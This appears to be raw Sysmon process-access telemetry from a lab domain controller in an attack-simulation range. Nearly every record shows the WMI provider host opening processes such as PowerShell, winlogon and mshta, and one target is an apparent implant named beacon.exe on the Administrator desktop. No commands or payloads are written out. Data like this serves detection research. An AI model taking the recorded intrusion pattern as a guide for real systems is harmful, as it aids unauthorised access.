16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237887Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237886Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.215{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237885Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237884Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237883Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237882Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237881Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237880Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237879Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237878Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237877Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237876Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237875Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237874Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237873Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:53.200{05ADC7E1-6D65-603E-86AA-00000000AD01}8004\PSHost.132591775730543745.8004.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237872Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237871Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237870Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237869Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=929FBC47BDCA58A5E92F534AE5F78264,SHA256=972117CE836B35B30A1A1D784BF81F405F3FCE85AD9541B04D717CB178FB9154,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237868Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.200{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237867Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 